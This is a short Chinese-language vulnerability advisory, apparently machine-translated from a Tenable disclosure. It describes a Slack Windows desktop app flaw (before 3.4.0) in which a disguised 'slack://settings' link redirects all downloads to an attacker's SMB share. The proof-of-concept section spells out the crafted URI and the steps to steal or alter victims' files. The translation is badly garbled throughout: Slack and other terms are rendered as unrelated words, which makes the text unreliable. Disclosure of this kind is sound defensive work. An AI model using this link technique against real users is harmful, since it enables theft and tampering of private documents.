Windows的桌面应用程序下载劫持

站得住脚的发现了一个漏洞影响Windows的桌面应用程序(3.4.0之前版本),可以让攻击者窃取文件下载。

攻击者可以滥用”松:/ /“协议处理器的能力改变敏感的设置在松弛的桌面应用程序。制作一个链接,如“松:/ /设置/ ?更新= {“PrefSSBFileDownloadPath”:“< newDownloadLocation >”}“将persitently更改默认如果点击文档下载位置。这个新目标下载位置可以攻击者拥有SMB份额,导致未来所有的下载文件是攻击者立即上传到服务器,这可能导致他们被偷或甚至自己的内容之前操纵受害者打开后下载。而且这种攻击可以通过“点击劫持”通过使用隐藏的“附件”功能松弛API,它允许链接的实际URI被替换为自定义文本。

攻击可以通过任何执行意味着可能会超链接文本呈现松弛通道或松弛的直接传递。这包括验证向量,胭脂马渠道成员发送链接到团体或个人通过直接消息,以及未经身份验证的向量,如外部. rss提要或其他外部拉松频道内容可能超链接的文本。

概念验证

1. 攻击者的帖子化妆舞会的超链接”松:/ /设置/ ?更新= {“PrefSSBFileDownloadPath”:“\ \ \ \ SMB-ip-address \ \共享”}附件“误导超链接文本使用松弛API功能。
2. 受害者点击链接,松弛是默默地改变默认的下载位置。
3. 受害者下载文档通过松弛应用程序通过私人信息或松弛的通道。立即下载文档上传到攻击者的SMB份额。
4. 文件现在在攻击者的手,可以选择修改或简单地偷。
5. 受害者仍然可以通过应用程序打开下载的文档,但是它将从攻击者的SMB份额。